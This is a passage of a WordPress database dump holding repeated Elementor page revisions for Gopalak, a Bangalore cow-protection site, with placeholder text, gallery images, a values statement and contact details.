.elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:49:04','2022-10-10 12:19:04','',1373,'https://gopalak.in/?p=1583',0,'revision','',0),(1584,1,'2022-10-10 17:49:04','2022-10-10 12:19:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:49:04','2022-10-10 12:19:04','',1373,'https://gopalak.in/?p=1584',0,'revision','',0),(1586,1,'2022-10-10 17:51:00','2022-10-10 12:21:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:51:00','2022-10-10 12:21:00','',1373,'https://gopalak.in/?p=1586',0,'revision','',0),(1587,1,'2022-10-10 17:51:00','2022-10-10 12:21:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:51:00','2022-10-10 12:21:00','',1373,'https://gopalak.in/?p=1587',0,'revision','',0),(1588,1,'2022-10-10 17:51:00','2022-10-10 12:21:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image 